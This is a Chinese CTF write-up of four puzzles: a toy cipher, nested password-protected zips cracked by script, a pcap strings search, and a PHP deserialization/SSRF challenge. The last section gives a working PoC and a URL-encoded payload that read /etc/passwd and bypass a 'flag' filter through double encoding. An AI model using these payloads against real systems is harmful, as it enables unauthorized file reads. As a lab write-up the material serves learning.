
Xman WP

common_encrypt

加密算法如下

def encrypt(data, groupnums):
    """Challenge cipher: column-wise interleave of *groupnums* chunks, then XOR by position.

    *data* is cut into chunks of ``int(len(data) / groupnums)`` characters.
    The output takes the first character of each of the first *groupnums*
    chunks, then the second character of each, and so on; any chunk past the
    first *groupnums* (the remainder of an uneven split) is never read.
    Every interleaved character is then XORed with its own index in the
    output string.

    Raises:
        ValueError: when *groupnums* exceeds ``len(data)`` (chunk size 0
            makes the slicing range step invalid).
        ZeroDivisionError: when *groupnums* is 0.
    """
    section = int(len(data) / groupnums)
    chunks = [data[start:start + section] for start in range(0, len(data), section)]
    # Read "down the columns": row r of every chunk before row r + 1.
    interleaved = [chunks[col][row] for row in range(section) for col in range(groupnums)]
    return ''.join(chr(ord(ch) ^ idx) for idx, ch in enumerate(interleaved))

把groupnums设为1,再加密一次,得到字符串
f_l1angt{3crr3ysptt10n_g1!s}
因为有花括号,怀疑这是栅栏密码,肉眼观察发现k是2
手输flag提交

onion_secret

把jpg后缀改为zip
发现hint的问号用0-10某个数字后是解压密码
解压一层还有一层,于是写脚本

import os
import sys
import zipfile
import zlib


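LAYER_ZIP = "onion.zip"
LAYER_HINT = "hint.txt"


def _candidate_passwords(template):
    """Yield *template* with its '?' replaced by each digit 0-9.

    Raises:
        ValueError: if *template* has no '?'. Slicing around find()'s -1
            would otherwise silently build a nonsense password.
    """
    position = template.find('?')
    if position < 0:
        raise ValueError(f"hint password {template!r} has no '?' placeholder")
    for digit in range(10):
        yield template[:position] + str(digit) + template[position + 1:]


def _hint_template(hint_path):
    """Return the third space-separated token of the hint file (the masked password)."""
    with open(hint_path, 'r') as f:
        return f.read().split(" ")[2]


def _unlock(archive, template):
    """Leave the first working candidate password set on *archive*.

    Returns:
        The password that decrypts LAYER_HINT, or None when all ten fail.
    """
    for password in _candidate_passwords(template):
        print(password)
        archive.setpassword(password.encode())
        try:
            archive.read(LAYER_HINT)
        except (RuntimeError, zipfile.BadZipFile, zlib.error):
            # Wrong password: zipfile raises RuntimeError from its header
            # check; the rare false positive shows up as a CRC/zlib failure.
            continue
        return password
    return None


def main():
    """Peel the nested archives layer by layer.

    Layer N is ``Nonion.zip`` + ``Nhint.txt``; its contents are written out
    as layer N + 1. Stops when a layer holds no nested archive (the last
    one, to be inspected by hand) and exits with a message when no
    candidate password opens a layer, instead of looping forever.
    """
    layer = 0
    while True:
        zip_path = str(layer) + LAYER_ZIP
        template = _hint_template(str(layer) + LAYER_HINT)
        with zipfile.ZipFile(zip_path, 'r') as archive:
            # The central directory is readable without a password, so the
            # innermost layer is recognised before any brute-forcing.
            names = archive.namelist()
            if LAYER_ZIP not in names or LAYER_HINT not in names:
                print(f"{zip_path} has no nested {LAYER_ZIP}; last layer reached")
                return
            if _unlock(archive, template) is None:
                sys.exit(f"none of the ten candidate passwords opened {zip_path}")
            data = archive.read(LAYER_ZIP)
            hint = archive.read(LAYER_HINT)
        with open(str(layer + 1) + LAYER_ZIP, 'wb') as f1:
            f1.write(data)
        with open(str(layer + 1) + LAYER_HINT, 'wb') as f2:
            f2.write(hint)
        print("hint")
        layer += 1


if __name__ == "__main__":
    main()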

解包到剩下最后一层,手动爆破,获得flag

strange_ssid

strings ctf.pcap | awk '{print $1}' | grep -E '^[A-Za-z0-9]+$'
得到一串正常字符串
提交字符串报错
添加flag{}标记提交,成功

ezphp

过程分析

打开拿到源码

<?php

class Hello {
    // Only ever populated by unserialize() of the `z` GET parameter below,
    // so it is attacker-chosen input rather than a configured value.
    protected $a;

    // Fetch $a with curl and echo the body. The 'flag' blocklist is the only
    // guard: strpos() returns 0 for a match at offset 0 (falsy, so it is not
    // blocked) and matches nothing once the name is percent-encoded. A
    // defensive version would compare `!== false` and, more importantly,
    // allowlist scheme and host (e.g. CURLOPT_PROTOCOLS limited to http/https).
    function test() {
        $needle_at = strpos($this->a, 'flag');
        if ($needle_at) {
            die("Bye!");
        }
        $handle = curl_init();
        curl_setopt($handle, CURLOPT_URL, $this->a);
        curl_setopt($handle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 5);
        echo curl_exec($handle);
    }

    // Fires as soon as the unserialized object is discarded, so no explicit
    // call from the request handler is needed to reach test().
    function __destruct() {
        $this->test();
    }
}

if (!isset($_GET["z"])) {
    // No payload: show this file so the source is readable.
    highlight_file(__FILE__);
} else {
    // Untrusted input goes straight into unserialize(). The return value is
    // dropped, so the rebuilt Hello object is destroyed at once and its
    // __destruct() -> test() chain runs with an attacker-chosen $a.
    // Safer choices: json_decode(), or at least unserialize()'s
    // 'allowed_classes' option to refuse object instantiation.
    unserialize($_GET["z"]);
}

发现是ssrf+反序列化
其中反序列化比较简单,unserialize() 的返回值没有被接收,对象随即被销毁,肯定会触发 __destruct
构造如下poc读取/etc/passwd

<?php

class Hello {
// Payload value: a file:// URL, which curl accepts like any other scheme.
protected $a='file:///etc/passwd';

// Same gadget as the challenge source; kept identical so the serialized form matches.
function test() {
$b = strpos($this->a, 'flag');
if($b) {
die("Bye!");
}
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $this->a);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5);
echo curl_exec($c);
}

// NOTE: this also runs when the generator script itself exits, so the
// local $a is fetched and echoed after the payload is printed.
function __destruct(){
$this->test();
}
}

// if (isset($_GET["z"])) {
// unserialize($_GET["z"]);
// } else {
// highlight_file(__FILE__);
// }
// Serialize, then URL-encode so the protected property's NUL-wrapped
// name (\0*\0a) and the slashes survive the query string.
$x = new Hello();
echo urlencode(serialize($x));

成功读取/etc/passwd

bypass

想要读取flag,发现有一个过滤,即读取文件必须是flagxxx(以flag开头)
虽然可以使用file协议,但是不能直接读取file:///flag
这里使用url编码绕过
将flag进行编码为%2566lag即可绕过检测:PHP 解析查询串时只解码一次,%25 变成 %,因此 $a 中存的是 %66lag,strpos 找不到 flag,而 curl 处理 file:// 路径时会再解码一次

payload

?z=O%3A5%3A%22Hello%22%3A1%3A%7Bs%3A4%3A%22%00%2A%00a%22%3Bs%3A14%3A%22file%3A%2F%2F%2F%2566lag%22%3B%7D